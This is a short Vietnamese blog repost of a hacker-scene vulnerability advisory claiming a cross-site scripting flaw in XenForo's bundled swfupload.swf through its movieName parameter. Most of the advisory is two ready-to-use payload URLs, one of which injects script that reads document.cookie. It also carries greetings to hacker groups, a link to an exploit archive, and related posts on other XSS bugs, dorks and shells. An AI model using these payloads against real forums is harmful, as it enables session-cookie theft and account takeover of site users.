XSS vul in Xenforo CMS

XSS vul in Xenforo CMS, lỗ hổng bảo mật xenforo

Title: XSS vul in Xenforo CMS.

Author: Darksnipper

CMS Link: www.xenforo.com
vul type: XSS.

VUL concept:
http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/js/swfupload/Flash/swfupload.swf?movieName=< s c ri pt> alert("halo") < / script >

Greetz: Dream.killer,ErrorHaxor,Soul~inj3ctor,x30-1337,Dr.v!ru$,Dr.z0mbie,soldier OfGod,shadow008,P4k c4mmand3r,Dark knight,Pak Cyber Army,3xp1r3 CyberArmy,Kashmir Cyber Army

Or read here:
http://www.exploit4arab.com/exploits/321

Leader at J2TEAM. Website: https://j2team.dev/

Sao chép

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!

Juno_okyo's Blog

XSS vul in Xenforo CMS

Đăng nhận xét

J2TEAM Cookies - Chia sẻ tài khoản mà không sợ lộ mật khẩu

PhpFox 3.0.1 Cross Site Scripting (XSS)

Hướng dẫn bảo vệ bạn chống lại các Hacker

Google Hacking DataBase (GHDB)

2012 Dorks & Shell